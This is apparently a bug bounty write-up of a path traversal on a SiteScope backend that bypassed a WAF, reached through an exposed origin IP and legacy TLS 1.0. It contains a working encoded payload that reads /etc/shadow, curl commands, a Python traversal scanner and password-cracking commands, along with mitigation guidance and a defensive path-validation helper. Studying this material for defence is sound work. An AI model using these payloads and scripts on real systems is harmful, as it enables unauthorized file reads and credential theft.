From Hidden IP to Root Files: How a $826 Path Traversal Bypassed WAF & Legacy TLS + Video


Introduction:

Path traversal (also known as directory traversal) is a web security vulnerability that allows an attacker to access files and directories stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their URL-encoded variants, attackers can read sensitive system files such as /etc/passwd, /etc/shadow, or application configuration files. In this real-world scenario, a penetration tester leveraged backend IP exposure—discovered via Shodan and nslookup—combined with legacy TLS 1.0 support to exploit a full path traversal, earning a $826 bounty.

Learning Objectives:

  • Understand how backend server IP exposure bypasses frontend WAF protections.
  • Learn to exploit path traversal vulnerabilities using encoded payloads and legacy TLS configurations in Burp Suite.
  • Master Linux commands to read sensitive files and simulate mitigation techniques like proper input validation and file permissions.

You Should Know:

1. Backend Discovery & Legacy TLS Exploitation

The first step in this attack chain was identifying an exposed backend server IP. The main domain was inaccessible, but Shodan (a search engine for internet-connected devices) revealed the origin IP, and `nslookup` confirmed that the address answered directly, with no WAF (Web Application Firewall) in front of it. The browser still could not connect, because the backend only supported the deprecated TLS 1.0 protocol. By enabling TLS 1.0 in Burp Suite, the tester restored connectivity and captured requests.

Step‑by‑step guide:

1. Discover the backend IP using Shodan: search for the main domain’s SSL certificate or DNS history. On Linux, use `dnsrecon` or `nslookup`:

```bash
# Resolve the domain directly
nslookup example.com
# Query Shodan via CLI (requires an API key)
shodan host <IP>
```

2. Test connectivity with `curl`, pinning the handshake to TLS 1.0 (`--tlsv1.0` alone only sets the minimum version on current curl releases):

```bash
curl -k --tlsv1.0 --tls-max 1.0 https://<backend-IP>:443
```

If the handshake fails with a protocol error, check `curl -V`: builds on recent OpenSSL may refuse TLS 1.0 at the default security level.

3. Configure Burp Suite to enable legacy TLS:

  • Go to Proxy → Options → TLS/SSL.
  • Under “Protocols,” check TLSv1.0 and TLSv1.1.
  • Under “Client SSL Certificates,” ensure no conflicting restrictions.

4. Intercept a request to the backend IP and send it to Repeater for manual manipulation.

Windows equivalent (PowerShell 7+):

```powershell
# Force TLS 1.0 and skip the certificate check (both parameters exist in PowerShell 7+)
Invoke-WebRequest -Uri "https://<backend-IP>/SiteScope/htdocs/artwork/" -SslProtocol Tls -SkipCertificateCheck
```

2. Crafting the Path Traversal Payload

The successful payload used in the bounty was:

`/SiteScope/htdocs/artwork//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow`

Notice the double slash after `artwork/` and the URL‑encoded `%2e%2e`, which the server decodes to `..`. This combination bypasses basic filters that look for a literal `../` in the raw request before URL decoding. Each `%2e%2e/` moves one directory up; after eight levels the payload has reached the root `/` (any surplus `..` at the root is a no‑op on Linux, so overshooting is harmless) and then descends into /etc/shadow.

Step‑by‑step guide to build and test:

1. Identify an input vector that reads a file (e.g., `?file=artwork/photo.jpg`).

2. Inject encoded traversal sequences:

```text
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
```

3. Use a shell loop to generate payloads of increasing depth (the `%` signs are doubled because `printf` would otherwise read `%2e` as a float format, and `seq` is used because `{1..$i}` does not brace‑expand with a variable):

```bash
# Generate payloads with different depths (1 to 10 levels of %2e%2e/)
for i in $(seq 1 10); do
  payload=$(printf '/%%2e%%2e%.0s' $(seq 1 "$i"))"/etc/passwd"
  echo "$payload"
done
```

4. Test with `curl`:

```bash
curl -k --tlsv1.0 --tls-max 1.0 "https://<backend-IP>/SiteScope/htdocs/artwork//%2e%2e/%2e%2e/%2e%2e/etc/shadow"
```

Common sensitive files on Linux:

– `/etc/passwd` – user account info
– `/etc/shadow` – password hashes (requires root)
– `/etc/hosts` – local DNS mappings
– `/etc/nginx/nginx.conf` – web server config
– `/proc/self/environ` – environment variables

Windows equivalents for path traversal:

– `C:\Windows\win.ini`
– `C:\boot.ini`
– `..\..\..\Windows\System32\config\SAM`

3. Automating Path Traversal Detection

The hacker mentioned using an automation tool. While the exact tool wasn’t named, typical scripts use payload lists and response analysis. Below is a Python script that automates the discovery of such vulnerabilities.

Python automation script:

```python
import requests
import urllib3

# verify=False is used below, so silence the per-request TLS warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

target = "https://<backend-IP>/SiteScope/htdocs/artwork/"
# These payloads are already URL-safe. Passing them through urllib.parse.quote()
# would re-encode '%' as %25 and '/' as %2F, destroying the variants under test.
payloads = [
    "../../../../etc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "....//....//....//etc/passwd",
    "..;/..;/../etc/passwd",
]

headers = {"User-Agent": "Mozilla/5.0"}
# For a TLS 1.0-only origin, route through Burp configured as in section 1,
# e.g. proxies={"https": "http://127.0.0.1:8080"}; some HTTP clients also
# normalise ../ before sending, so confirm the raw request in the proxy.
for payload in payloads:
    url = target + payload
    try:
        r = requests.get(url, verify=False, headers=headers, timeout=5)
        # /etc/passwd always begins with the root entry
        if "root:x:" in r.text or "bin/bash" in r.text:
            print(f"[!] Vulnerable: {url}")
            print(r.text[:500])
    except requests.RequestException as e:
        print(f"Error: {e}")
```

Run with:

```bash
pip install requests
python3 traversal_scanner.py
```

4. Mitigation & Hardening Against Path Traversal

To prevent such attacks, developers and system administrators must implement multiple layers of defense.

Step‑by‑step mitigation guide:

1. Input validation – reject any input containing `../`, `..\`, `%2e%2e` or their variants, checked after URL decoding and path normalization rather than on the raw request.
   – Use a whitelist of allowed filenames and prepend a base directory.
2. Disable legacy TLS protocols – on web servers, enforce TLS 1.2 or higher.
   – Apache: `SSLProtocol -all +TLSv1.2 +TLSv1.3`
   – Nginx: `ssl_protocols TLSv1.2 TLSv1.3;`
   – IIS (Windows): use the IIS Crypto tool to disable TLS 1.0/1.1.
3. Hide backend IPs – use a reverse proxy (Cloudflare, AWS ELB, or Nginx) and block direct origin access via firewall rules.
   – Linux iptables:

```bash
# Accept HTTPS only from the trusted proxy, drop everything else
iptables -A INPUT -p tcp --dport 443 -s <trusted-proxy-IP> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
```

4. Run web applications under least privilege – the web server user should not have read access to `/etc/shadow` or system configuration files.
   – Set file permissions (readable only by root and the `shadow` group):

```bash
chmod 640 /etc/shadow
chown root:shadow /etc/shadow
```

5. Use a Web Application Firewall (WAF) with rules that block encoded path traversal sequences. Test the WAF using the same payloads.
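Added example, not code from the original write‑up or from SiteScope: a Python helper implementing mitigation step 1 above, which canonicalizes the requested path (repeated percent‑decoding, backslash and `;` handling) before rejecting `..`, and then re‑checks containment under the base directory as a second layer. It is exercised against the encoded, double‑slash, `....//` and `..;/` variants from sections 2 and 3; the web root path is assumed.

```python
# Added example, not code from the original write-up or from SiteScope.
# BASE_DIR is an assumed web root; the real deployment path is unknown.
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/SiteScope/htdocs/artwork"


def canonicalize(user_path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (so %252e%252e is
    seen as ..), normalise backslashes, strip ';' path parameters (the
    '..;/' trick) and drop empty and '.' segments ('//', './')."""
    decoded = user_path
    for _ in range(max_rounds):
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    decoded = decoded.replace("\\", "/")
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    return "/".join(seg for seg in segments if seg not in ("", "."))


def is_traversal(user_path: str) -> bool:
    """True if any canonical segment contains '..' (also catches '....//')."""
    return any(".." in seg for seg in canonicalize(user_path).split("/"))


def resolve_under_base(user_path: str, base: str = BASE_DIR):
    """Absolute path to serve, or None to reject. Layer 1 rejects '..';
    layer 2 re-checks containment after normalisation, so a bypass of one
    check still has to beat the other."""
    if is_traversal(user_path):
        return None
    full = posixpath.normpath(posixpath.join(base, canonicalize(user_path)))
    if full != base and not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, the rest traversal variants
    for p in ["photo.jpg", "//%2e%2e/%2e%2e/%2e%2e/etc/shadow",
              "....//....//etc/passwd", "..;/..;/etc/passwd",
              "%252e%252e/etc/passwd", "..%5c..%5cWindows/win.ini"]:
        print(f"{p!r:40} -> {resolve_under_base(p)}")
```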

5. Post-Exploitation: What an Attacker Can Do

Once `/etc/shadow` is exposed, an attacker can crack password hashes using tools like John the Ripper or Hashcat. With `/etc/passwd` and /etc/hosts, internal network mapping becomes possible.

Example hash extraction and cracking:

```bash
# Extract the root hash from /etc/shadow (the line starting with root:)
grep '^root:' shadow.txt > root_hash.txt
# Crack with John
john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt root_hash.txt
```

Windows post‑exploitation:

  • Dump SAM hashes using `reg save` or Mimikatz (if privileged).

Defensive countermeasures:

  • Enforce strong password policies.
  • Use file integrity monitoring (e.g., AIDE or Tripwire) to detect unauthorized reads.
  • Implement runtime application self-protection (RASP).

6. API Security Implications

Path traversal is not limited to web pages; APIs are equally vulnerable. If an API endpoint accepts a `filePath` parameter, the same encoding tricks work.

Test an API for traversal:

```bash
curl -X GET "https://api.example.com/download?file=%2e%2e/%2e%2e/%2e%2e/etc/passwd"
```

Secure API design:

  • Use a unique file identifier (e.g., UUID) mapped to a physical path on the server.
  • Never expose filesystem paths directly.
  • Validate MIME types and restrict file extensions.

What Undercode Say:

  • Backend exposure is a critical blind spot – even if the frontend is offline, misconfigured origin servers directly accessible on the internet are goldmines for attackers.
  • Legacy protocols are silent backdoors – TLS 1.0 remains enabled on numerous production systems, allowing attackers to bypass modern security controls. Regular protocol audits are non‑negotiable.

This case highlights the importance of defense in depth: hiding your origin IP, deprecating insecure TLS versions, sanitizing file paths, and restricting filesystem permissions together could have prevented this $826 breach. Automation accelerates discovery, but manual creativity—like URL‑encoded double dots—still bypasses many filters. For red teams, always test encoded variants; for blue teams, reject all input containing `%2e` or `..` after canonicalization.

Prediction:

As more organizations adopt API‑first architectures and serverless backends, path traversal will evolve into parameter pollution attacks against cloud storage (e.g., S3 bucket traversal) and GraphQL resolvers. The intersection of legacy TLS enforcement and misconfigured reverse proxies will remain a top‑10 vector through 2027. Automated scanners integrated with Shodan and Censys will routinely discover such flaws, forcing companies to implement real‑time origin IP rotation and mandatory TLS 1.3 ciphers. Expect bug bounty programs to raise bounties for traversal to file‑hash disclosure (e.g., /etc/shadow) to $1,000–$5,000 range.

Reported By: Engr Shahid – Hackers Feeds